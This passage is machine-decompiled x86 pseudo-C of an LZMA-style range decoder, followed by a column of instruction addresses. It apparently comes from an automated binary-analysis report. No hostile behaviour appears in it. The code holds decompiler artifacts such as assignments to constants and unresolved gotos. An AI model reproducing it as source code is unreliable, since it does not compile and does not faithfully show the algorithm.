												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067ee
                                                                                    0x004067f2
                                                                                    0x004069a1
                                                                                    0x004069b7
                                                                                    0x004069bf
                                                                                    0x004069c6
                                                                                    0x004069c8
                                                                                    0x004069cf
                                                                                    0x004069d3
                                                                                    0x004069d3
                                                                                    0x004067fe
                                                                                    0x00406805
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406813
                                                                                    0x00406813
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fb5
                                                                                    0x00405fbe
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x00000000
                                                                                    0x00405fcf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fd8
                                                                                    0x00405fdb
                                                                                    0x00405fde
                                                                                    0x00405fe2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fe8
                                                                                    0x00405feb
                                                                                    0x00405fed
                                                                                    0x00405fee
                                                                                    0x00405ff1
                                                                                    0x00405ff3
                                                                                    0x00405ff4
                                                                                    0x00405ff6
                                                                                    0x00405ff9
                                                                                    0x00405ffe
                                                                                    0x00406003
                                                                                    0x0040600c
                                                                                    0x0040601f
                                                                                    0x00406022
                                                                                    0x0040602e
                                                                                    0x00406056
                                                                                    0x00406058
                                                                                    0x00406066
                                                                                    0x00406066
                                                                                    0x0040606a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x0040605a
                                                                                    0x0040605d
                                                                                    0x0040605e
                                                                                    0x0040605e
                                                                                    0x00000000
                                                                                    0x0040605a
                                                                                    0x00406034
                                                                                    0x00406039
                                                                                    0x00406039
                                                                                    0x00406042
                                                                                    0x0040604a
                                                                                    0x0040604d
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406053
                                                                                    0x00000000
                                                                                    0x00406070
                                                                                    0x00406070
                                                                                    0x00406074
                                                                                    0x00406920
                                                                                    0x00000000
                                                                                    0x00406920
                                                                                    0x0040607d
                                                                                    0x0040608d
                                                                                    0x00406090
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406093
                                                                                    0x00406096
                                                                                    0x0040609a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040609c
                                                                                    0x004060a2
                                                                                    0x004060cc
                                                                                    0x004060d2
                                                                                    0x004060d9
                                                                                    0x00000000
                                                                                    0x004060d9
                                                                                    0x004060a8
                                                                                    0x004060ab
                                                                                    0x004060b0
                                                                                    0x004060b0
                                                                                    0x004060bb
                                                                                    0x004060c3
                                                                                    0x004060c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040610b
                                                                                    0x00406111
                                                                                    0x00406114
                                                                                    0x00406121
                                                                                    0x00406129
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004060e0
                                                                                    0x004060e0
                                                                                    0x004060e4
                                                                                    0x0040692f
                                                                                    0x00000000
                                                                                    0x0040692f
                                                                                    0x004060f0
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fb
                                                                                    0x004060fe
                                                                                    0x00406101
                                                                                    0x00406104
                                                                                    0x00406109
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067a0
                                                                                    0x004067a0
                                                                                    0x004067a6
                                                                                    0x004067ac
                                                                                    0x004067b2
                                                                                    0x004067cc
                                                                                    0x004067cf
                                                                                    0x004067d5
                                                                                    0x004067e0
                                                                                    0x004067e2
                                                                                    0x004067b4
                                                                                    0x004067b4
                                                                                    0x004067c3
                                                                                    0x004067c7
                                                                                    0x004067c7
                                                                                    0x004067ec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406131
                                                                                    0x00406133
                                                                                    0x00406136
                                                                                    0x004061a7
                                                                                    0x004061aa
                                                                                    0x004061ad
                                                                                    0x004061b4
                                                                                    0x004061be
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00406138
                                                                                    0x0040613c
                                                                                    0x0040613f
                                                                                    0x00406141
                                                                                    0x00406144
                                                                                    0x00406147
                                                                                    0x00406149
                                                                                    0x0040614c
                                                                                    0x0040614e
                                                                                    0x00406153
                                                                                    0x00406156
                                                                                    0x00406159
                                                                                    0x0040615d
                                                                                    0x00406164
                                                                                    0x00406167
                                                                                    0x0040616e
                                                                                    0x00406172
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x0040617a
                                                                                    0x00406174
                                                                                    0x00406174
